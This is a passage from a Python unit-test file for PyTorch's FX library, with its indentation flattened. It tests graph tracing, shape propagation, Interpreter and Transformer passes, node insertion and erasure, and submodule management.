graph = RTTracer().trace(ut)
mod = torch.fx.GraphModule(ut, graph)
shape_prop.ShapeProp(mod).propagate(torch.rand(3, 4))
for node in mod.graph.nodes:
if node.op == 'call_module':
assert 'tensor_meta' in node.meta
tensor_meta = node.meta['tensor_meta']
assert tensor_meta[0] == 3
assert tensor_meta[1].shape == torch.Size([])
def test_shape_prop_layout_3d(self):
class ConvTest3d(torch.nn.Module):
def __init__(self):
super().__init__()
self.conv_mod = torch.nn.Conv3d(5, 5, 3)
def forward(self, x):
return self.conv_mod(x)
test_mod_3d = ConvTest3d()
traced_3d = symbolic_trace(test_mod_3d)
x_3d = torch.randn(5, 5, 224, 224, 15)
shape_prop.ShapeProp(traced_3d).propagate(x_3d)
assert(all(node.meta['tensor_meta'].memory_format is torch.contiguous_format
for node in traced_3d.graph.nodes))
x_channels_last_3d = x_3d.contiguous(memory_format=torch.channels_last_3d)
traced_3d.to(memory_format=torch.channels_last_3d)
shape_prop.ShapeProp(traced_3d).propagate(x_channels_last_3d)
for node in traced_3d.graph.nodes:
# NB: the implementation of conv may not preserve the memory format,
# unfortunately. The best we can do is just check that the placeholder
# node is channels-last
if node.op in {'placeholder'}:
self.assertEqual(node.meta['tensor_meta'].memory_format, torch.channels_last_3d)
def test_interpreter(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
interpreter = Interpreter(gm)
input = torch.randn(3, 4)
self.assertEqual(interpreter.run(input), gm(input))
self.assertEqual(interpreter.run(input), m(input))
def test_interpreter_run_node_override(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
class RunNodeInterpreter(Interpreter):
def __init__(self, module):
super().__init__(module)
def run_node(self, n : Node) -> Any:
result = super().run_node(n)
n.cached_value = result
return result
input = torch.randn(3, 4)
RunNodeInterpreter(gm).run(input)
for node in gm.graph.nodes:
assert hasattr(node, 'cached_value')
def test_interpreter_onthefly_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapInterpreter(Interpreter):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
input = torch.randn(3, 4)
result = NegSigmSwapInterpreter(gm).run(input)
self.assertEqual(result, torch.neg(input).sigmoid())
def test_interpreter_partial_eval(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
gm = torch.fx.symbolic_trace(MyModule())
interp = Interpreter(gm)
env = {}
for node in gm.graph.nodes:
if node.op == 'call_module' and node.target == 'linear':
env[node] = torch.arange(0, 12, 1).reshape(3, 4) - 6.0
break
assert len(env) == 1
x = torch.randn(3, 4)
result = interp.run(x, initial_env=env)
self.assertEqual(result, (torch.arange(0, 12, 1).reshape(3, 4) - 6.0).clamp(0.0, 1.0))
def test_interpreter_star_args(self):
def with_star_args(x, *args):
return x + args[0]
gm = torch.fx.symbolic_trace(with_star_args)
interp = Interpreter(gm)
result = interp.run(torch.ones(3, 4), torch.ones(3, 4), torch.rand(3, 4))
self.assertEqual(result, torch.ones(3, 4) * 2.0)
@skipIfNoTorchVision
def test_interpreter_noop_resnet18(self):
rn18 = resnet18()
transformed = torch.fx.Transformer(symbolic_trace(rn18)).transform()
inp = torch.randn(5, 3, 224, 224)
self.assertEqual(transformed(inp), rn18(inp))
@skipIfNoTorchVision
def test_interpreter_gc_values(self):
rn18 = resnet18()
interp = Interpreter(symbolic_trace(rn18))
inp = torch.rand(5, 3, 224, 224)
out = interp.run(inp)
env_key_names = set(n.name for n in interp.env.keys())
self.assertEqual(env_key_names, set(['output']))
def test_transformer_noop(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
return self.linear(x + self.param).clamp(min=0.0, max=1.0)
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_transformer_op_swap(self):
def fn(x):
return torch.sigmoid(x).neg()
gm = torch.fx.symbolic_trace(fn)
class NegSigmSwapXformer(Transformer):
def call_function(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == torch.sigmoid:
return torch.neg(*args, **kwargs)
return super().call_function(n)
def call_method(self, target : Target, args : Tuple, kwargs : Dict) -> Any:
if target == 'neg':
call_self, *args_tail = args
return call_self.sigmoid(*args_tail, **kwargs)
return super().call_method(n)
transformed = NegSigmSwapXformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(transformed(input), torch.neg(input).sigmoid())
def test_transformer_multi_outputs(self):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.param = torch.nn.Parameter(torch.rand(3, 4))
self.linear = torch.nn.Linear(4, 5)
def forward(self, x):
x = x + self.param
out = self.linear(x)
return x, out
m = MyModule()
gm = torch.fx.symbolic_trace(m)
new_gm = Transformer(gm).transform()
input = torch.randn(3, 4)
self.assertEqual(new_gm(input), gm(input))
def test_fn_type_annotations(self):
class Foo(torch.nn.Module):
def forward(self, p : Pair, z : torch.Tensor, i : int) -> Dict[str, torch.Tensor]:
return {'a': p.x + p.y + z + i}
foo_scripted = torch.jit.script(Foo())
foo_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
fxed = symbolic_trace(Foo())
fxed_scripted = torch.jit.script(fxed)
fxed_scripted(Pair(torch.rand(5), torch.rand(5)), torch.rand(5), 3)
def test_fn_type_annotation_empty(self):
def forward(a : List[torch.Tensor]):
return a[0]
torch.jit.script(symbolic_trace(forward))
def test_wrapped_method(self):
def wrap_with_relu(fn):
@functools.wraps(fn)
def wrapper(*args, **kwargs):
return torch.relu(fn(*args, **kwargs))
return wrapper
class Foo(torch.nn.Module):
@wrap_with_relu
def forward(self, x, w):
return torch.matmul(x, w)
f = Foo()
traced = symbolic_trace(f)
x, w = torch.rand(3, 4), torch.rand(4, 4)
self.assertTrue(any(n.target == torch.relu for n in traced.graph.nodes))
def test_empty_graph_codegen(self):
graph = torch.fx.Graph()
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
self.assertEqual(gm(), None)
def test_sequential(self):
m = torch.nn.Sequential(torch.nn.Conv2d(1, 1, 1))
gm = torch.fx.symbolic_trace(m)
gm_copy = copy.deepcopy(gm)
def test_ctx_mgr(self):
@contextlib.contextmanager
def do_nothing():
yield
class M(torch.nn.Module):
def __init__(self):
super().__init__()
@do_nothing()
def forward(self, x):
return torch.relu(x)
m = M()
self.checkGraphModule(m, (torch.rand(3, 4),))
def test_typename_print(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,),
type_expr=List[float])
output : torch.fx.Node = graph.output(b)
self.assertTrue('typing.List[float]' in str(graph))
def test_ellipsis(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y):
return x + y[:, 1:10, ...]
traced = symbolic_trace(M())
x, y = torch.rand(5, 9, 3, 4), torch.rand(5, 15, 3, 4)
self.assertEqual(traced(x, y), x + y[:, 1:10, ...])
def test_inf_nan(self):
class FooMod(torch.nn.Module):
def forward(self, x):
return x + float('inf'), x + float('-inf'), x + float('nan')
fm = FooMod()
self.checkGraphModule(fm, (torch.rand(3, 4),))
def test_inf_nan_kwds(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('inf')), {}, name='inf')
c : torch.fx.Node = graph.create_node('call_function', operator.add, (x, float('nan')), {}, name='nan')
graph.output((b, c))
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
x = torch.rand(3, 4)
self.assertEqual(gm(x), (x + float('inf'), x + float('nan')))
def test_deepcopy_recursion_depth(self):
depth = sys.getrecursionlimit() + 20
g = torch.fx.Graph()
x = g.placeholder('x')
for i in range(depth):
x = g.call_function(torch.relu, (x,))
g.output(x)
copied_graph = copy.deepcopy(g)
val_map = {}
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
val_map[orig_node] = new_node
for orig_node, new_node in zip(g.nodes, copied_graph.nodes):
orig_users = set(orig_node.users.keys())
orig_users_equiv = set(val_map[u] for u in orig_users)
new_users = set(new_node.users.keys())
self.assertEqual(orig_users_equiv, new_users)
@skipIfNoTorchVision
def test_replace_uses(self):
rn18 = resnet18()
class LowerReluTracer(torch.fx.Tracer):
def is_leaf_module(self, m : torch.nn.Module, qualname : str):
if isinstance(m, torch.nn.ReLU):
return False
return super().is_leaf_module(m, qualname)
rn18_traced = GraphModule(rn18, LowerReluTracer().trace(rn18))
to_erase = []
for node in rn18_traced.graph.nodes:
if node.op == 'call_function' and node.target in [torch.relu, torch.nn.functional.relu]:
kwargs = node.kwargs.copy()
# Neg doesn't have in-place
kwargs.pop('inplace')
with rn18_traced.graph.inserting_before(node):
new_node = rn18_traced.graph.call_function(
the_function=torch.neg, args=node.args, kwargs=node.kwargs)
node.replace_all_uses_with(replace_with=new_node)
to_erase.append(node)
for node in to_erase:
rn18_traced.graph.erase_node(node)
def test_insertion_point(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
with graph.inserting_before(b):
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_move_before(self):
graph : torch.fx.Graph = torch.fx.Graph()
x : torch.fx.Node = graph.create_node('placeholder', 'x')
b : torch.fx.Node = graph.create_node('call_function', target=torch.relu, args=(x,))
output : torch.fx.Node = graph.output(b)
neg : torch.fx.Node = graph.call_function(the_function=torch.neg, args=(x,))
_, *relu_args = b.args
b.args = (neg, *relu_args)
b.prepend(neg)
gm = torch.fx.GraphModule(torch.nn.Module(), graph)
input = torch.randn(33, 44)
self.assertEqual(gm(input), torch.relu(torch.neg(input)))
def test_erase_node_error(self):
st = SimpleTest()
traced = symbolic_trace(st)
for node in traced.graph.nodes:
# Test deleting with uses both in another Node and at the output
if node.target in [operator.add, torch.relu]:
with self.assertRaisesRegex(RuntimeError, 'but it still had .* users in the graph'):
traced.graph.erase_node(node)
def test_copy_it(self):
d = immutable_dict([(3, 4), (5, 6)])
l = immutable_list([(3, 4), (5, 6)])
self.assertEqual(d, deepcopy(d))
self.assertEqual(l, deepcopy(l))
def test_get_torch_func_signature(self):
for key in dir(torch):
obj = getattr(torch, key)
if callable(obj):
schemas = get_signature_for_torch_op(obj)
def test_find_uses(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
y = torch.relu(x)
z = x + x
u = torch.neg(x)
graph.output((y + z + u).node)
graph.lint()
users_of_x = x.node.users
self.assertEqual(len(users_of_x), 3)
expected_ops = set(['relu', 'add', 'neg'])
for use in users_of_x:
assert any(use.name.startswith(prefix) for prefix in expected_ops)
def test_inline_graph(self):
class InlineInto(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class ToInline(torch.nn.Module):
def forward(self, x):
return torch.neg(x)
inline_into = symbolic_trace(InlineInto())
to_inline = symbolic_trace(ToInline())
combined_graph = torch.fx.Graph()
output_node = combined_graph.graph_copy(inline_into.graph, {})
input_node = list(to_inline.graph.nodes)[0]
assert input_node and input_node.op == 'placeholder'
val_map = {input_node : output_node}
output = combined_graph.graph_copy(to_inline.graph, val_map)
combined_graph.output(output)
combined_module = torch.fx.GraphModule(torch.nn.Module(), combined_graph)
input = torch.rand(3, 4)
self.assertEqual(combined_module(input), input.relu().neg())
def test_multi_insert_point(self):
graph = torch.fx.Graph()
x = torch.fx.Proxy(graph.placeholder('x'))
relu = torch.relu(x)
with graph.inserting_before(relu.node):
y = torch.neg(x)
z = torch.tanh(y)
graph.output((relu.node, z.node))
graph.lint()
expected_ops = ['x', 'neg', 'tanh', 'relu']
for node, expected in zip(graph.nodes, expected_ops):
assert expected in node.name
def test_reassign_args_kwargs_uses(self):
graph = torch.fx.Graph()
x, y = Proxy(graph.placeholder('x')), Proxy(graph.placeholder('y'))
z = x + y
zed = z + z + z
graph.output(zed.node)
graph.lint()
# zed = z + z + z -> zed = z + z + x
zed.node.args = (zed.node.args[0], x.node)
self.assertEqual(x.node.users.keys(), [z.node, zed.node])
# z = x + y -> z = y + y
z.node.args = (y.node, y.node)
self.assertEqual(x.node.users.keys(), [zed.node])
def test_trace_function(self):
def foo(x, y):
return torch.relu(x) + y
x, y = torch.randn(3, 4), torch.randn(3, 4)
self.checkGraphModule(foo, (x, y))
def test_trace_dict_int_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[int, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({42: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
traced_graph = MyTracer().trace(CallsModWithDict())
def test_trace_dict_proxy_keys(self):
class ModWithDictArg(torch.nn.Module):
def forward(self, d : Dict[torch.Tensor, torch.Tensor]):
return d[42]
class CallsModWithDict(torch.nn.Module):
def __init__(self):
super().__init__()
self.m = ModWithDictArg()
def forward(self, x):
return self.m({x: x})
class MyTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return isinstance(m, ModWithDictArg)
with self.assertRaisesRegex(RuntimeError, 'cannot contain a Node'):
traced_graph = MyTracer().trace(CallsModWithDict())
def test_direct_param_use(self):
class TransposeTest(torch.nn.Module):
def __init__(self):
super().__init__()
self.b = torch.nn.Parameter(torch.rand(4, 3))
def forward(self, x):
return self.b
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
self.a = TransposeTest()
def forward(self, x):
return self.a.b, self.a.b.t(), self.a.b.view(12)
traced = torch.fx.symbolic_trace(Foo())
assert(all('constant' not in node.target for node in traced.graph.nodes))
def test_single_default_arg(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1):
return y
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
def test_multiple_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, y=1, z=2):
return y + z
m = M()
self.checkGraphModule(m, ())
self.checkGraphModule(m, (3,))
self.checkGraphModule(m, (3, 4))
def test_regular_and_default_args(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self, x, y=1):
return x + y
m = M()
self.checkGraphModule(m, (2,))
self.checkGraphModule(m, (2, 3))
def test_string_literal_return(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
def forward(self):
return "foo"
m = M()
self.checkGraphModule(m, ())
def test_namedtuple_return_qualname(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return MyNamedTup(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), MyNamedTup(input, input))
def test_update_args_kwargs_yells_at_you(self):
symtraced = symbolic_trace(SimpleTest())
node = next(iter(symtraced.graph.nodes))
with self.assertRaisesRegex(AttributeError, '__update_args_kwargs'):
node.__update_args_kwargs((), {})
def test_torchbind_class_attribute_in_fx(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._StackString is registered, skipping")
class FooBar1234(torch.nn.Module):
def __init__(self):
super(FooBar1234, self).__init__()
self.f = torch.classes._TorchScriptTesting._StackString(["3", "4"])
def forward(self):
return self.f.top()
m = FooBar1234()
self.checkGraphModule(m, ())
def test_torchbind_class_attribute_in_fx_tensor_arg(self):
if TEST_WITH_ROCM or IS_SANDCASTLE or IS_WINDOWS or IS_MACOS:
self.skipTest("torch.classes._TorchScriptTesting._ReLUClass is registered, skipping")
class FooBar2341(torch.nn.Module):
def __init__(self):
super(FooBar2341, self).__init__()
self.f = torch.classes._TorchScriptTesting._ReLUClass()
def forward(self, x):
return self.f.run(x)
m = FooBar2341()
traced = symbolic_trace(m)
input = torch.randn(3, 4)
self.assertEqual(traced(input), m(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_script_method_trace(self):
class Scripted(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
class Holder(torch.nn.Module):
def __init__(self):
super().__init__()
self.s = torch.jit.script(Scripted())
def forward(self, x):
return self.s(x)
h = Holder()
traced = symbolic_trace(h)
input = torch.randn(3, 4)
self.assertEqual(traced(input), h(input))
self.assertTrue(any(n.op == 'call_method' for n in traced.graph.nodes))
def test_namedtuple_return_trace(self):
class NamedTupReturn(torch.nn.Module):
def forward(self, x):
return Pair(x, x)
traced = symbolic_trace(NamedTupReturn())
input = torch.rand(3, 4)
self.assertEqual(traced(input), Pair(input, input))
def test_return_type_exists(self):
class ReturnTypeModule(torch.nn.Module):
def other(self, x: List[str]) -> List[str]:
return x
def forward(self, x: List[str]) -> List[str]:
return self.other(x)
traced = symbolic_trace(ReturnTypeModule())
self.assertIn("-> typing_List[str]", traced._code)
scripted = torch.jit.script(traced)
self.assertIn("-> List[str]", scripted.code)
def getitem_inner(self):
class GetItemBase(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer('pe', torch.randn(8, 8))
class GetItem1(GetItemBase):
def forward(self, x):
return self.pe[:, :x.size(0)]
class GetItem2(GetItemBase):
def forward(self, x):
return self.pe[x.size(0)]
class GetItem3(GetItemBase):
def forward(self, x):
return self.pe[4] # fx creates `self._tensor_constant0` here
self.checkGraphModule(GetItem1(), [torch.zeros(4)])
self.checkGraphModule(GetItem2(), [torch.zeros(4)])
self.checkGraphModule(GetItem3(), [torch.zeros(4)])
@unittest.skipUnless(os.environ.get("FX_PATCH_GETITEM") == "1",
"Will be checked in test_getitem_subproc")
def test_getitem(self):
self.getitem_inner()
def test_getitem_subproc(self):
# need to run this test in a subproc to work around:
# https://github.com/pytorch/pytorch/issues/50710
proc = Process(target=run_getitem_target)
proc.start()
proc.join()
self.assertEqual(proc.exitcode, 0)
def test_user_friendly_call_provenance_with_function(self):
def fn(x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(fn)
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'fn.forward'"):
scripted = torch.jit.script(traced)
def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3), 6)
self.assertEqual(mod_false(3), 3)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertIn("Call using an FX-traced Module, line 4 of the "
"traced Module's generated forward function:",
captured[0])
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotIn("Call using an FX-traced Module, line 4 of the"
" traced Module's generated forward function:",
captured)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
